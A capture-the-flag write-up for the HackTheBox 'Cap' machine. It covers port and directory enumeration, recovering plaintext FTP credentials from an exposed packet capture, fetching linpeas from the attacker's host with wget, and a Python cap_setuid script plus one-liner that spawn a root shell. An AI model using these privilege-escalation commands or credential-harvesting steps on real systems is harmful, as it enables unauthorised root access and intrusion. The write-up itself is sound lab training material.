Cap HackTheBox Writeup
Cap HackTheBox Writeup (Easy)
As shown below are the statistics
Enumeration (NMAP)
Firstly I ran an NMAP scan to identify open ports, service detection and information.
nmap -sC -sV 10.10.10.245
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-17 23:31 EDT
Nmap scan report for 10.10.10.245
Host is up (0.13s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Fri, 18 Jun 2021 03:43:59 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Fri, 18 Jun 2021 03:43:53 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Fri, 18 Jun 2021 03:43:53 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: HEAD, GET, OPTIONS
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
| </body>
|_ </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.91%I=7%D=6/17%Time=60CC13AF%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,15A0,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20
SF:Fri,\x2018\x20Jun\x202021\x2003:43:53\x20GMT\r\nConnection:\x20close\r\
SF:nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20193
SF:86\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\">\
SF:n\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x2
SF:0<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\
SF:x20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<meta\
SF:x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=
SF:1\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"image
SF:/png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x20<
SF:link\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css\">
SF:\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/fon
SF:t-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20
SF:href=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20rel=
SF:\"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20\x2
SF:0<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.min\.
SF:css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/c
SF:ss/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOption
SF:s,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Fri,\x2
SF:018\x20Jun\x202021\x2003:43:53\x20GMT\r\nConnection:\x20close\r\nConten
SF:t-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20HEAD,\x20GET,\x20OP
SF:TIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1\x2
SF:0400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20text
SF:/html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\x20
SF:\x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<body>\
SF:n\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Invali
SF:d\x20HTTP\x20Version\x20'Invalid\x20HTTP\x20Version:\x20'RTSP
SF:/1\.0''\n\x20\x20</body>\n</html>\n")%r(FourOhFourRequest,189
SF:,"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x20F
SF:ri,\x2018\x20Jun\x202021\x2003:43:59\x20GMT\r\nConnection:\x20close\r\n
SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20232\
SF:r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\x20
SF:Final//EN\">\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>
SF:\n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20ser
SF:ver\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20ch
SF:eck\x20your\x20spelling\x20and\x20try\x20again\.</p>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.03 seconds
Analysing the results above we see three ports open and three services running, they go in the following list.
- 21 = vsftpd 3.0.3
- 22 = OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
- 80/tcp open http gunicorn
If you're unaware of what "gunicorn" is here is a brief explanation, Gunicorn "Green Unicorn" is a Python Web Server Gateway Interface HTTP server.
Web App Enumeration
Heading over to the Web Application we see a nice template being provided by "Colorlib"
Lets try discovering some files and directories running Gobuster, this can help us enumerate any kind of pages/functionality on the Web App and or information that isn't suppose to be disclosed thus can lead to vulnerabilities E.G a webpage that allows us to upload files but is under construction.
gobuster dir -u http://10.10.10.245 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.245
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/17 23:56:46 Starting gobuster in directory enumeration mode
===============================================================
/data (Status: 302) [Size: 208] [--> http://10.10.10.245/]
/ip (Status: 200) [Size: 17466]
/netstat (Status: 200) [Size: 32292]
/capture (Status: 302) [Size: 222] [--> http://10.10.10.245/data/16]
Analysing the responses we have two "302" status codes which are "Found redirection" and than we have two "200" which is "OK Success" lets check these out heading over to the following URL: 10.10.10.245/ip
This page seems to be displaying "ipconfig" for Windows based users and "ifconfig" for Linux based users, this displays the boxes eth0 interface configuration E.G the "inet" so some how this is posting information about the box, whether this be live I am unsure. Lets check the source code to check for any kind of possible Information Disclosure/comments on this.
I see the following on how it is displaying the "eth0" interface configuration, the source code displays the following.
<pre>eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.245 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:9a6f prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:9a6f prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:9a:6f txqueuelen 1000 (Ethernet)
RX packets 2907275 bytes 373001526 (373.0 MB)
RX errors 0 dropped 290 overruns 0 frame 0
TX packets 3095798 bytes 675868558 (675.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 34789 bytes 2672084 (2.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34789 bytes 2672084 (2.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0</pre>
Due to the look of this I do not believe there is an API being loaded as its inside of pre tags but this doesn't mean there isn't an API Endpoint somewhere, we can try checking the Network tab but firstly what are pre tags used for?? Pre tags are used to define a block of preformatted text that preserves line breaks, spaces etc.
Checking the Network tab is pretty simple we can just press "F12" and navigate to "Netwrok" press "F5" which will refresh the page and analyse everything being loaded onto that Web Server/page.
I do not see anything being loaded API wise, lets move on to the next thing which is "/netstat" this sounds interesting and I am wondering if this is live or if its just been copy and pasted, we will follow the same mindset of analysing the page and the contents being loaded than we will view the source code again.
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name Timer
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 101 32358 - off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 33655 - off (0.00/0/0)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1001 35841 - off (0.00/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35224 TIME_WAIT 0 0 - timewait (37.23/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:35811 ESTABLISHED 1001 437271 - on (0.62/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:33113 ESTABLISHED 1001 436671 - on (0.56/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:57691 TIME_WAIT 0 0 - timewait (18.69/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.16:57266 ESTABLISHED 1001 436729 - off (0.00/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35264 TIME_WAIT 0 0 - timewait (55.26/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35192 TIME_WAIT 0 0 - timewait (32.73/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35172 TIME_WAIT 0 0 - timewait (4.11/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35186 TIME_WAIT 0 0 - timewait (33.14/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35216 TIME_WAIT 0 0 - timewait (34.35/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35244 TIME_WAIT 0 0 - timewait (40.74/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35212 TIME_WAIT 0 0 - timewait (36.98/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:46493 ESTABLISHED 1001 437275 - on (0.54/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:40887 TIME_WAIT 0 0 - timewait (44.16/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35198 TIME_WAIT 0 0 - timewait (31.82/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:35577 ESTABLISHED 1001 437274 - on (0.62/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35196 TIME_WAIT 0 0 - timewait (32.60/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:47709 ESTABLISHED 1001 437273 - on (0.40/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:51535 ESTABLISHED 1001 436688 - on (0.49/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:53699 TIME_WAIT 0 0 - timewait (43.73/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:32991 TIME_WAIT 0 0 - timewait (18.79/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35246 TIME_WAIT 0 0 - timewait (43.95/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:38617 TIME_WAIT 0 0 - timewait (40.03/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35242 TIME_WAIT 0 0 - timewait (42.42/0/0)
tcp 0 0 10.10.10.245:22 10.10.14.124:35156 ESTABLISHED 0 37911 - keepalive (1276.17/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35170 TIME_WAIT 0 0 - timewait (0.00/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35222 TIME_WAIT 0 0 - timewait (39.52/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:44185 ESTABLISHED 1001 436670 - on (0.48/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35204 TIME_WAIT 0 0 - timewait (33.14/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35194 TIME_WAIT 0 0 - timewait (32.73/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35188 TIME_WAIT 0 0 - timewait (32.79/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:41435 ESTABLISHED 1001 437272 - on (0.49/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35190 TIME_WAIT 0 0 - timewait (32.73/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35206 TIME_WAIT 0 0 - timewait (31.89/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35210 TIME_WAIT 0 0 - timewait (42.56/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35228 TIME_WAIT 0 0 - timewait (46.46/0/0)
tcp 0 0 10.10.10.245:80 10.10.14.19:35256 TIME_WAIT 0 0 - timewait (48.67/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:50513 ESTABLISHED 1001 437294 - on (0.51/0/0)
tcp 0 166 10.10.10.245:80 10.10.14.19:46967 ESTABLISHED 1001 437296 - on (0.54/0/0)
tcp6 0 0 :::21 :::* LISTEN 0 33290 - off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN 0 33657 - off (0.00/0/0)
udp 0 0 127.0.0.53:53 0.0.0.0:* 101 31957 - off (0.00/0/0)
udp 0 0 10.10.10.245:60625 1.1.1.1:53 ESTABLISHED 101 433148 - off (0.00/0/0)
udp 0 0 127.0.0.1:37307 127.0.0.53:53 ESTABLISHED 102 437297 - off (0.00/0/0)
udp 0 0 10.10.10.245:55763 1.1.1.1:53 ESTABLISHED 101 433147 - off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] SEQPACKET LISTENING 25965 - /run/udev/control
unix 2 [ ] DGRAM 38090 1192/systemd /run/user/1001/systemd/notify
unix 2 [ ACC ] STREAM LISTENING 38093 1192/systemd /run/user/1001/systemd/private
unix 2 [ ACC ] STREAM LISTENING 38099 1192/systemd /run/user/1001/bus
unix 2 [ ACC ] STREAM LISTENING 38100 1192/systemd /run/user/1001/gnupg/S.dirmngr
unix 2 [ ACC ] STREAM LISTENING 38101 1192/systemd /run/user/1001/gnupg/S.gpg-agent.browser
unix 2 [ ACC ] STREAM LISTENING 38102 1192/systemd /run/user/1001/gnupg/S.gpg-agent.extra
unix 2 [ ACC ] STREAM LISTENING 25949 - @/org/kernel/linux/storage/multipathd
unix 2 [ ACC ] STREAM LISTENING 38103 1192/systemd /run/user/1001/gnupg/S.gpg-agent.ssh
unix 3 [ ] DGRAM 25933 - /run/systemd/notify
unix 2 [ ACC ] STREAM LISTENING 38104 1192/systemd /run/user/1001/gnupg/S.gpg-agent
unix 2 [ ACC ] STREAM LISTENING 38105 1192/systemd /run/user/1001/pk-debconf-socket
unix 2 [ ACC ] STREAM LISTENING 38106 1192/systemd /run/user/1001/snapd-session-agent.socket
unix 2 [ ACC ] STREAM LISTENING 25936 - /run/systemd/private
unix 2 [ ACC ] STREAM LISTENING 25938 - /run/systemd/userdb/io.systemd.DynamicUser
unix 2 [ ACC ] STREAM LISTENING 25947 - /run/lvm/lvmpolld.socket
unix 2 [ ] DGRAM 25950 - /run/systemd/journal/syslog
unix 10 [ ] DGRAM 25958 - /run/systemd/journal/dev-log
unix 2 [ ACC ] STREAM LISTENING 25960 - /run/systemd/journal/stdout
unix 9 [ ] DGRAM 25962 - /run/systemd/journal/socket
unix 2 [ ACC ] STREAM LISTENING 34700 - /run/irqbalance//irqbalance821.sock
unix 2 [ ACC ] STREAM LISTENING 26920 - /run/systemd/journal/io.systemd.journal
unix 2 [ ACC ] STREAM LISTENING 31209 - /run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 31220 - /run/snapd.socket
unix 2 [ ACC ] STREAM LISTENING 31222 - /run/snapd-snap.socket
unix 2 [ ACC ] STREAM LISTENING 31224 - /run/uuidd/request
unix 2 [ ACC ] STREAM LISTENING 31881 - /var/run/vmware/guestServicePipe
unix 2 [ ACC ] STREAM LISTENING 31214 - /var/snap/lxd/common/lxd/unix.socket
unix 2 [ ACC ] STREAM LISTENING 31213 - @ISCSIADM_ABSTRACT_NAMESPACE
unix 2 [ ] DGRAM 33081 -
unix 2 [ ] DGRAM 26922 -
unix 3 [ ] STREAM CONNECTED 34873 -
unix 3 [ ] STREAM CONNECTED 29694 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 31731 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 71252 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 71305 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 34686 65345/sh
unix 3 [ ] STREAM CONNECTED 32581 -
unix 3 [ ] STREAM CONNECTED 32894 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 32727 -
unix 3 [ ] STREAM CONNECTED 34878 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 38094 1192/systemd
unix 3 [ ] STREAM CONNECTED 39198 -
unix 3 [ ] STREAM CONNECTED 57408 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 57429 4486/dbus-daemon /run/user/1001/bus
unix 3 [ ] STREAM CONNECTED 30433 -
unix 3 [ ] STREAM CONNECTED 29693 - /run/systemd/journal/stdout
unix 2 [ ] DGRAM 38082 1192/systemd
unix 2 [ ] DGRAM 27681 -
unix 3 [ ] STREAM CONNECTED 57407 4486/dbus-daemon
unix 3 [ ] STREAM CONNECTED 29551 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 30640 -
unix 2 [ ] DGRAM 38075 -
unix 3 [ ] STREAM CONNECTED 30699 -
unix 3 [ ] STREAM CONNECTED 71251 22397/dirmngr
unix 3 [ ] STREAM CONNECTED 57324 1192/systemd
unix 3 [ ] STREAM CONNECTED 57426 4486/dbus-daemon
unix 2 [ ] DGRAM 34872 -
unix 3 [ ] STREAM CONNECTED 30434 -
unix 3 [ ] STREAM CONNECTED 57427 4486/dbus-daemon
unix 3 [ ] STREAM CONNECTED 34259 -
unix 3 [ ] STREAM CONNECTED 29550 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 71304 -
unix 3 [ ] STREAM CONNECTED 39199 -
unix 3 [ ] DGRAM 25934 -
unix 3 [ ] DGRAM 38092 1192/systemd
unix 3 [ ] STREAM CONNECTED 26564 -
unix 2 [ ] DGRAM 57419 4486/dbus-daemon
unix 3 [ ] DGRAM 38091 1192/systemd
unix 3 [ ] STREAM CONNECTED 32505 -
unix 3 [ ] STREAM CONNECTED 31956 -
unix 3 [ ] STREAM CONNECTED 37159 - /run/dbus/system_bus_socket
unix 3 [ ] DGRAM 25935 -
unix 2 [ ] DGRAM 31877 -
unix 2 [ ] DGRAM 31749 -
unix 2 [ ] DGRAM 34980 -
unix 3 [ ] STREAM CONNECTED 34874 -
unix 3 [ ] STREAM CONNECTED 33326 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 33747 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 33067 -
unix 2 [ ] DGRAM 27112 -
unix 3 [ ] STREAM CONNECTED 33773 -
unix 3 [ ] STREAM CONNECTED 38064 1192/systemd
unix 2 [ ] STREAM CONNECTED 36982 -
unix 3 [ ] STREAM CONNECTED 33333 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 27176 - /run/systemd/journal/stdout
unix 2 [ ] DGRAM 35192 -
unix 3 [ ] STREAM CONNECTED 34879 - /run/dbus/system_bus_socket
unix 2 [ ] DGRAM 36316 -
unix 2 [ ] DGRAM 47888 -
unix 3 [ ] STREAM CONNECTED 31212 -
unix 3 [ ] STREAM CONNECTED 33332 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 33445 -
unix 2 [ ] DGRAM 37042 -
unix 3 [ ] STREAM CONNECTED 31240 -
unix 3 [ ] STREAM CONNECTED 31309 - /run/systemd/journal/stdout
unix 3 [ ] DGRAM 71550 -
unix 3 [ ] DGRAM 26594 -
unix 3 [ ] STREAM CONNECTED 31382 - /run/systemd/journal/stdout
unix 3 [ ] DGRAM 31200 -
unix 3 [ ] STREAM CONNECTED 72068 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 31876 -
unix 3 [ ] STREAM CONNECTED 32979 - /run/systemd/journal/stdout
unix 3 [ ] DGRAM 27115 -
unix 3 [ ] STREAM CONNECTED 33754 - /run/dbus/system_bus_socket
unix 3 [ ] DGRAM 31201 -
unix 3 [ ] STREAM CONNECTED 34969 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 37143 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 34875 - /run/dbus/system_bus_socket
unix 2 [ ] DGRAM 31195 -
unix 3 [ ] STREAM CONNECTED 32890 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 71648 -
unix 3 [ ] DGRAM 31199 -
unix 3 [ ] STREAM CONNECTED 32972 -
unix 3 [ ] STREAM CONNECTED 34876 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 27177 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 34877 - /run/dbus/system_bus_socket
unix 3 [ ] DGRAM 31198 -
unix 3 [ ] DGRAM 26595 -
unix 3 [ ] STREAM CONNECTED 29868 -
unix 3 [ ] DGRAM 26596 -
unix 3 [ ] STREAM CONNECTED 31380 -
unix 3 [ ] STREAM CONNECTED 35157 -
unix 3 [ ] STREAM CONNECTED 33777 -
unix 3 [ ] STREAM CONNECTED 27103 -
unix 3 [ ] DGRAM 26593 -
unix 3 [ ] DGRAM 71551 -
unix 3 [ ] STREAM CONNECTED 35199 -
unix 2 [ ] DGRAM 26588 -
unix 3 [ ] DGRAM 27114 -
unix 3 [ ] STREAM CONNECTED 31308 -
unix 3 [ ] STREAM CONNECTED 29869 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 33776 -
unix 3 [ ] STREAM CONNECTED 33774 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 33186 -
Once again its inside of pre tags so I can only assume its been copy and pasted onto the Web Page but this still gives an overview of what is running on the box (connections, ports, sockets etc) this information can help us map the machine.
Exploitation
Heading over to "/capture" we see the following in the URL "/data/10".
This shows a preview of packets. In my case there is "0" on everything so there is no traffic, I am going to try loading /capture once again to analyse if there is any traffic being loaded. Interesting this time I see "/data/11" what if we change it to "/data/5"
It displays packets but in an exact form this is weird and looks fake, lets try view "1" or "0" "/data/0"
This shows a basic number of packets and there data types E.G "Number of Packets" "72" and so on. Lets download this "packet capture" assuming its a .pcap file we can load it into wireshark which is a packet analyser/traffic analyser.
Do the following to successfully load the .pcap file into wireshark and analyse the traffic.
- Search for "wireshark" or download and install it.
- Click "file" and than select "open".
- Navigate other to the directory where the 0.pcap file is and click "open".
If done correctly you'll see a lot of traffic if this is your first time using wireshark do not panic, please watch a video on Wireshark traffic analysis than come back or if you're interested in a breif overview stay here.
As we can see above there is a basic layout E.G "Time, Source, Destination, Protocol, Length Information" Source is the IP Address the packet was sent from and the Destination is usually the reciever than the protocol is what they're using tto communicate E.G "TCP, HTTP" now we seen there was "VSFTPD" on the machine, the issue with FTP/VSFTPD is that credentials are sent in plain text so if we use the "filter" option of wireshark and look for FTP we may be able to gain a bit of information.
As you can see there is FTP Traffic meaning there is most likely some credentials analysing the traffic we can see "Nathan" which is a possible username I confirmed this by double clicking on the request and clicking through "FTP".
We then FTP asking for a password which got sent in plain text.
"Buck3tH4TF0RM3!" is the FTP Passowrd! 1+1 = Username:nathan Password:Buck3tH4TF0RM3! we can now login with FTP.
We are now logged in so we can start enumerating the box, the first things I wanna check is if I can move directories? "cd /home" gave me a directory change successfully message meaning we can.
We also had SSH open on the SSH Default port "22" lets try authenticate with the same credentials.
Priv Esc
Now we are on the box as "Nathan" we need to get root. I am going to run linpeas which is a popular tool for identifying ways to priv esc and spotting stuff that is a potential risk E.G They will check for binaries, cronjobs, permissions etc etc.
Assuming you've got linpeas on your box we will use the following commands to transfer it to Nathan's box using a popular web server within python3.
python3 -m http.server
wget http://$IP:8000/linpeas.sh
Make sure you have "linpeas.sh" in your working directory E.G /opt/HTB/linpeas.sh and then start your web server in /opt/HTB/linpeas.sh
Now we need to give linpeas executable permissions, we can run the following commands as the Nathan user to successfully run linpeas.
chmod +x linpeas.sh
Now run "linpeas.sh" using the following command and please do not get overwhelmed if this is your first time viewing linpeas.
There is a lot of information, if you are unsure about 90% of it please just do some research E.G "Checking for crontabs" if you are unaware of what a crontab is Google.
Also keep an eye on the color output as shown below.
linpeas v3.2.5 by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) LightMagenta: Your username
Going through linpeas we see "Files with capabilities (limited to 50):" and Python3 is under that category.
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
The binary is owned by root. We also should note the "cap_setuid" there is something in the Python os module that allows us to get the users UID and set a user UID and a lot more, I believe because of the "cap_setuid" we can change our UID.
The plan is that if we can change our SUID we can change it to "0" and that being root.
I wrote a script that will try setting the UID you parse E.G "0" if it can set the UID it'll spawn a bash shell with that UID else it'll print an error. So if you come along a CTF that has the capabilities to set your UID using python3 you can now use this or simply do a one liner which I will also show.
import os
uid = os.getuid()
print("Your current SUID is:", uid)
setuid = int(input("Enter an SUID: "))
print("Attempting to set UID")
try:
os.setuid(setuid);
print("Success")
os.system("/bin/bash");
except:
print("An error occurred, sorry")
Breaking this down we import the "os" module, we set a variable called "uid" which gets the current UID it then prints "Your current SUID is" then parses that variable.
It then creates another variable called "setuid" which takes an input for the UID they want to set, it then prints attempting to set UID. It then tries to set the uid and parses the users input and then it prints success and spawns a bin bash shell and if it cannot set that UID it'll print an error occurred.
I am now root! The one liner is simply:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
I hope you enjoyed this detailed writeup.
A Twitter follow is always appreciated.